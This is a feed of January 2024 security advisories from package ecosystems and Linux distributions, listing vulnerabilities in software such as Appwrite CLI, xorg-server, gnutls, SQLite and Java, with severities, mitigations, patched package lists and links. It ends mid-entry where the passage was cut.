13.01.2024 01:19:30	npm	[NPM:GHSA-G777-CRP9-M27G] Apprite CLI makes Use of Hard-coded Credentials (moderate)	In Appwrite CLI before 3.0.0, when using the login command, the credentials of the Appwrite user are stored in a ~/.appwrite/prefs.json file with 0644 as UNIX permissions. Any user of the local system can access those credentials.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G777-CRP9-M27G
12.01.2024 10:00:00	msrc	[MS:CVE-2024-20666] BitLocker Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20666
12.01.2024 10:00:00	msrc	[MS:CVE-2024-20658] Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20658
12.01.2024 10:00:00	msrc	[MS:CVE-2024-0056] Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0056
12.01.2024 10:00:00	msrc	[MS:CVE-2024-0057] NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0057
12.01.2024 10:00:00	msrc	[MS:CVE-2024-21312] .NET Framework Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21312
13.01.2024 17:16:36	rubysec	[RUBYSEC:DEVISE-TWO-FACTOR-2024-0227] Devise-Two-Factor vulnerable to brute force attacks (medium)	Devise-Two-Factor does not throttle or otherwise restrict loginattempts at the server by default. When combined with the Time-basedOne Time Password algorithm's (TOTP) inherent entropy limitations,it's possible for an attacker to bypass the 2FA mechanism throughbrute-force attacks.### ImpactIf a user's username and password have already been compromised anattacker would be able to try possible TOTP codes and see if theycan hit a lucky collision to log in as that user. The user underattack would not necessarily know that their account has beencompromised.### PatchesDevise-Two-Factor has not released any fixes for this vulnerability.This library is open-ended by design and cannot solve this for allapplications natively. It's recommended that any application leveragingDevise-Two-Factor implement controls at the application level tomitigate this threat. A non-exhaustive list of possible mitigationscan be found below.#### Mitigations1. Use the `lockable` strategy from Devise to lock a user after a certain number of failed login attempts. See https://www.rubydoc.info/github/heartcombo/devise/main/Devise/Models/Lockable for more information.2. Configure a rate limit for your application, especially on the endpoints used to log in. One such library to accomplish this is [rack-attack](https://rubygems.org/gems/rack-attack).3. When displaying authentication errors hide whether validating a username/password combination failed or a two-factor code failed behind a more generic error message.### AcknowledgementsChristian Reitter ([Radically Open Security](https://www.radicallyopensecurity.com/))and Chris MacNaughton ([Centauri Solutions](https://centauri.solutions))	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DEVISE-TWO-FACTOR-2024-0227
14.01.2024 02:00:00	gentoo	[GLSA-202401-17] libgit2: Privilege Escalation Vulnerability (normal)	A vulnerability has been found in libgit2 which could result in privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-17
14.01.2024 05:38:29	rustsec	[RUSTSEC-2024-0001] Unsound use of str::from_utf8_unchecked on bytes which are not UTF-8	Affected versions receive a `&[u8]` from the caller through a safe API, and passit directly to the unsafe `str::from_utf8_unchecked` function.The behavior of `ferris_says::say` is undefined if the bytes from the callerdon't happen to be valid UTF-8.The flaw was corrected in [ferris-says#21] by using the safe `str::from_utf8`instead, and returning an error on invalid input. However this fix has not yetbeen published to crates.io as a patch version for 0.2.Separately, [ferris-says#32] has introduced a different API for version 0.3which accepts input as `&str` rather than `&[u8]`, so is unaffected by this bug.[ferris-says#21]: https://github.com/rust-lang/ferris-says/pull/21[ferris-says#32]: https://github.com/rust-lang/ferris-says/pull/32	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0001
15.01.2024 20:31:03	ubuntu	[USN-6585-1] libssh2 vulnerability (medium)	libssh2 could be made to expose sensitive information over the network.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6585-1
15.01.2024 19:17:57	ubuntu	[USN-6584-1] Libspf2 vulnerabilities (critical)	Several security issues were fixed in Libspf2.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6584-1
15.01.2024 17:23:32	ubuntu	[USN-6583-1] MySQL vulnerabilities (medium)	Several security issues were fixed in MySQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6583-1
15.01.2024 15:52:06	ubuntu	[USN-6582-1] WebKitGTK vulnerability (medium)	Several security issues were fixed in WebKitGTK.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6582-1
15.01.2024 13:57:53	ubuntu	[USN-6581-1] GNU binutils vulnerabilities (high)	Several security issues were fixed in GNU binutils.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6581-1
15.01.2024 13:45:46	ubuntu	[USN-6580-1] w3m vulnerability (medium)	w3m could be made to crash or run programs as your login if it opened a malicious website.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6580-1
15.01.2024 02:00:00	gentoo	[GLSA-202401-18] zlib: Buffer Overflow (high)	A vulnerability has been found in zlib that can lead to a heap-based buffer overflow.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-18
15.01.2024 02:00:00	gentoo	[GLSA-202401-19] Opera: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been found in Opera, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-19
15.01.2024 02:00:00	gentoo	[GLSA-202401-20] QPDF: Buffer Overflow (normal)	A vulnerability has been found in QPDF which can lead to a heap-based buffer overflow.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-20
15.01.2024 02:00:00	gentoo	[GLSA-202401-21] KTextEditor: Arbitrary Local Code Execution (normal)	A vulnerability has been found in KTextEditor where local code can be executed without user interaction.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-21
15.01.2024 02:00:00	gentoo	[GLSA-202401-22] libspf2: Multiple vulnerabilities (normal)	Multiple vulnerabilities have been discovered in libspf2, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-22
15.01.2024 02:00:00	redhat	[RHSA-2024:0253] sqlite security update (moderate)	SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server.Security Fix(es):* sqlite: heap-buffer-overflow at sessionfuzz (CVE-2023-7104)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0253
15.01.2024 02:00:00	redhat	[RHSA-2024:0256] python3 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0256
16.01.2024 22:56:51	slackware	[SSA:2024-016-02] xorg-server	New xorg-server packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/xorg-server-1.20.14-i586-11_slack15.0.txz: Rebuilt. This update fixes security issues: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer. Reattaching to different master device may lead to out-of-bounds memory access. Heap buffer overflow in XISendDeviceHierarchyEvent. Heap buffer overflow in DisableDevice. SELinux context corruption. SELinux unlabeled GLX PBuffer. For more information, see: https://lists.x.org/archives/xorg/2024-January/061525.html https://www.cve.org/CVERecord?id=CVE-2023-6816 https://www.cve.org/CVERecord?id=CVE-2024-0229 https://www.cve.org/CVERecord?id=CVE-2024-21885 https://www.cve.org/CVERecord?id=CVE-2024-21886 https://www.cve.org/CVERecord?id=CVE-2024-0408 https://www.cve.org/CVERecord?id=CVE-2024-0409 (* Security fix )patches/packages/xorg-server-xephyr-1.20.14-i586-11_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xnest-1.20.14-i586-11_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xvfb-1.20.14-i586-11_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xwayland-21.1.4-i586-10_slack15.0.txz: Rebuilt. This update fixes security issues: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer. Reattaching to different master device may lead to out-of-bounds memory access. Heap buffer overflow in XISendDeviceHierarchyEvent. Heap buffer overflow in DisableDevice. SELinux unlabeled GLX PBuffer. For more information, see: https://lists.x.org/archives/xorg/2024-January/061525.html https://www.cve.org/CVERecord?id=CVE-2023-6816 https://www.cve.org/CVERecord?id=CVE-2024-0229 https://www.cve.org/CVERecord?id=CVE-2024-21885 https://www.cve.org/CVERecord?id=CVE-2024-21886 https://www.cve.org/CVERecord?id=CVE-2024-0408 ( Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-1.20.14-i586-11_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xephyr-1.20.14-i586-11_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xnest-1.20.14-i586-11_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xvfb-1.20.14-i586-11_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xwayland-21.1.4-i586-10_slack15.0.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-1.20.14-x86_64-11_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xephyr-1.20.14-x86_64-11_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xnest-1.20.14-x86_64-11_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xvfb-1.20.14-x86_64-11_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xwayland-21.1.4-x86_64-10_slack15.0.txzUpdated packages for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-21.1.11-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xephyr-21.1.11-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xnest-21.1.11-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xvfb-21.1.11-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xwayland-23.2.4-i586-1.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-21.1.11-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xephyr-21.1.11-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xnest-21.1.11-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xvfb-21.1.11-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xwayland-23.2.4-x86_64-1.txzMD5 signaturesSlackware 15.0 packages:cbfc1d90a9b15381b3fde1cc05d3393a xorg-server-1.20.14-i586-11_slack15.0.txz13e01fa593096111f41c8de08b1bd407 xorg-server-xephyr-1.20.14-i586-11_slack15.0.txzf81a8f96742881f732e3784ceefe42aa xorg-server-xnest-1.20.14-i586-11_slack15.0.txzb223aa9470870a7f231d251597501605 xorg-server-xvfb-1.20.14-i586-11_slack15.0.txz5a6593bafecb4f43f4404b31c959a91c xorg-server-xwayland-21.1.4-i586-10_slack15.0.txzSlackware x86_64 15.0 packages:cc3ae53ea9b14335b608a485344aae01 xorg-server-1.20.14-x86_64-11_slack15.0.txzd52148237c62011adceaba103458718c xorg-server-xephyr-1.20.14-x86_64-11_slack15.0.txz27c8dad2969a0551dadc1bdbc0a76b74 xorg-server-xnest-1.20.14-x86_64-11_slack15.0.txza9b04919e14289a4e10e1c361ba8c96c xorg-server-xvfb-1.20.14-x86_64-11_slack15.0.txz8ed1857f20c19679edc79a6d4ce9a58d xorg-server-xwayland-21.1.4-x86_64-10_slack15.0.txzSlackware -current packages:d795fb2800b568f72e805652319a5bb9 x/xorg-server-21.1.11-i586-1.txzb05c18e825d04e6a1b477b1da9dbc85c x/xorg-server-xephyr-21.1.11-i586-1.txz01cde17a95b6664d99f65e35eb4a143c x/xorg-server-xnest-21.1.11-i586-1.txz369134fd6e429782098a13b5fdebe3bf x/xorg-server-xvfb-21.1.11-i586-1.txz088af0fe9440910f53cbb0c5f1534260 x/xorg-server-xwayland-23.2.4-i586-1.txzSlackware x86_64 -current packages:5e206bee3b5bd7984be71dc0d4f3bf95 x/xorg-server-21.1.11-x86_64-1.txz1350d0aa457d88076e59869b7f987382 x/xorg-server-xephyr-21.1.11-x86_64-1.txz9b3b568a4a59cabe5571efdf08a279b6 x/xorg-server-xnest-21.1.11-x86_64-1.txza197b434af664928dd02f9cef6ae1f9a x/xorg-server-xvfb-21.1.11-x86_64-1.txz6f0c97a807cc2d14d3eb36b22e5f17e0 x/xorg-server-xwayland-23.2.4-x86_64-1.txzInstallation instructionsUpgrade the packages as root:`# upgradepkg xorg-server-.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-016-02
16.01.2024 22:56:31	slackware	[SSA:2024-016-01] gnutls (medium)	New gnutls packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/gnutls-3.8.3-i586-1_slack15.0.txz: Upgraded. This update fixes two medium severity security issues: Fix more timing side-channel inside RSA-PSK key exchange. Fix assertion failure when verifying a certificate chain with a cycle of cross signatures. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-0553 https://www.cve.org/CVERecord?id=CVE-2024-0567 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/gnutls-3.8.3-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/gnutls-3.8.3-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/gnutls-3.8.3-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/gnutls-3.8.3-x86_64-1.txzMD5 signaturesSlackware 15.0 package:883c919c39e4003d280aa7a7ce96fa6c gnutls-3.8.3-i586-1_slack15.0.txzSlackware x86_64 15.0 package:f87ab044e8b0e5e3badb1e93947abc80 gnutls-3.8.3-x86_64-1_slack15.0.txzSlackware -current package:09f41babc753a0b69ec3ae25804111ed n/gnutls-3.8.3-i586-1.txzSlackware x86_64 -current package:370bcaa3e93e54fe6cf135161261e5a4 n/gnutls-3.8.3-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg gnutls-3.8.3-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-016-01
16.01.2024 17:24:42	npm	[NPM:GHSA-62JR-84GF-WMG4] Default swagger-ui configuration exposes all files in the module (moderate)	### ImpactThe default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module.### PatchesUpdate to v2.1.0### WorkaroundsUse the `baseDir` option### References[HackerOne report](https://hackerone.com/reports/2312369).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-62JR-84GF-WMG4
16.01.2024 17:20:09	ubuntu	[USN-6587-1] X.Org X Server vulnerabilities	Several security issues were fixed in X.Org X Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-1
16.01.2024 16:46:02	ubuntu	[USN-6559-1] ZooKeeper vulnerabilities (critical)	Several security issues were fixed in ZooKeeper.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6559-1
16.01.2024 14:44:38	ubuntu	[USN-6586-1] FreeImage vulnerabilities (high)	Several security issues were fixed in FreeImage.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6586-1
16.01.2024 14:15:24	ubuntu	[USN-6579-2] Xerces-C++ vulnerability (high)	Xerces-C++ could be made to crash or run programs if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6579-2
16.01.2024 02:00:00	cisa	[CISA-2024:0116] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0116
16.01.2024 02:00:00	gentoo	[GLSA-202401-23] libuv: Buffer Overread (low)	A buffer overread vulnerability has been found in libuv.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-23
16.01.2024 02:00:00	gentoo	[GLSA-202401-24] Nettle: Denial of Service (normal)	Multiple denial of service vulnerabilities have been discovered in Nettle.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-24
16.01.2024 02:00:00	oraclelinux	[ELSA-2024-0253] sqlite security update (moderate)	[3.26.0-19.0.1]- Fixed CVE-2023-7104	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0253
16.01.2024 02:00:00	oraclelinux	[ELSA-2024-0256] python3 security update (moderate)	[3.6.8-56.0.1.3]- Security fix for CVE-2023-27043Resolves: rhbz#2196183	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0256
16.01.2024 02:00:00	vmware	[VMSA-2024-0001] VMware Aria Automation (formerly vRealize Automation) updates address a Missing Access Control vulnerability (CVE-2023-34063) (critical)		https://secdb.nttzen.cloud/security-advisory/vmware/VMSA-2024-0001
16.01.2024 22:45:55	maven	[MAVEN:GHSA-RXGG-273W-RFW7] Remote Code Execution vulnerability in Apache IoTDB via UDF (moderate)	Remote Code Execution vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 1.0.0 through 1.2.2.Users are recommended to upgrade to version 1.3.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RXGG-273W-RFW7
16.01.2024 22:34:50	maven	[MAVEN:GHSA-JC7H-C423-MPJC] Apache Shiro vulnerable to path traversal (moderate)	Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JC7H-C423-MPJC
16.01.2024 22:36:50	maven	[MAVEN:GHSA-GG7W-PW2R-X2CQ] Apache Solr allows read access to host environmet variables (moderate)	Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.The Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users are able to specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host, unlike Java system properties which are set per-Java-proccess.The Solr Metrics API is protected by the "metrics-read" permission. Therefore, Solr Clouds with Authorization setup will only be vulnerable via users with the "metrics-read" permission.This issue affects Apache Solr: from 9.0.0 before 9.3.0.Users are recommended to upgrade to version 9.3.0 or later, in which environment variables are not published via the Metrics API.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GG7W-PW2R-X2CQ
16.01.2024 18:37:01	npm	[NPM:GHSA-GGPM-9QFX-MHWG] EverShop vulnerable to improper authorization in GraphQL endpoints (moderate)	Lack of authentication in NPM's package @evershop/evershop before version 1.0.0-rc.9, allows remote attackers to obtain sensitive information via improper authorization in GraphQL endpoints.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GGPM-9QFX-MHWG
16.01.2024 18:36:49	npm	[NPM:GHSA-32R3-57HP-CGFW] EverShop at risk to unauthorized access via weak HMAC secret (high)	An issue was discovered in NPM's package @evershop/evershop before version 1.0.0-rc.9. The HMAC secret used for generating tokens is hardcoded as "secret". A weak HMAC secret poses a risk because attackers can use the predictable secret to create valid JSON Web Tokens (JWTs), allowing them access to important information and actions within the application.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-32R3-57HP-CGFW
16.01.2024 10:00:00	msrc	[MS:CVE-2024-20677] Microsoft Office Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20677
16.01.2024 10:00:00	msrc	[MS:CVE-2024-0057] NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0057
17.01.2024 20:17:38	msrc	[MS:CVE-2024-0519] Chromium: CVE-2024-0519 Out of bounds memory access in V8		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0519
17.01.2024 20:17:35	msrc	[MS:CVE-2024-0518] Chromium: CVE-2024-0518 Type Confusion in V8		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0518
17.01.2024 20:17:31	msrc	[MS:CVE-2024-0517] Chromium: CVE-2024-0517 Out of bounds write in V8		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0517
17.01.2024 19:43:02	ubuntu	[USN-6588-1] PAM vulnerability	PAM could be made to stop responding if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6588-1
17.01.2024 07:20:49	ubuntu	[USN-6538-2] PostgreSQL vulnerabilities (high)	Several security issues were fixed in PostgreSQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6538-2
17.01.2024 02:55:00	amazonlinux	[ALAS2-2024-2414] Amazon Linux 2 2017.12 - ALAS2-2024-2414: important priority package update for java-11-amazon-corretto (important)	Package updates are available for Amazon Linux 2 that fix the following vulnerabilities:CVE-2024-20952: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).CVE-2024-20945: Crypto key may be leaked via debug logging in some casesCVE-2024-20926: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).CVE-2024-20925: There are several integer overflows in the media handlingCVE-2024-20923: Missing validation may cause unexpected issues.CVE-2024-20922: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).CVE-2024-20921: Loop optimizations are not correct when induction variable overflowsCVE-2024-20919: With carefully crafted custom bytecodes, arbitrary unverified bytecodes could be executed.CVE-2024-20918: A vulnerability that allows an attacker to execute arbitrary java code from the javascript engine even though the option "--no-java" was set.	https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS2-2024-2414
17.01.2024 02:55:00	amazonlinux	[ALAS2-2024-2415] Amazon Linux 2 2017.12 - ALAS2-2024-2415: important priority package update for java-17-amazon-corretto (important)	Package updates are available for Amazon Linux 2 that fix the following vulnerabilities:CVE-2024-20952: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).CVE-2024-20945: Crypto key may be leaked via debug logging in some casesCVE-2024-20932: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 17.0.9; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).CVE-2024-20925: There are several integer overflows in the media handlingCVE-2024-20923: Missing validation may cause unexpected issues.CVE-2024-20922: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise 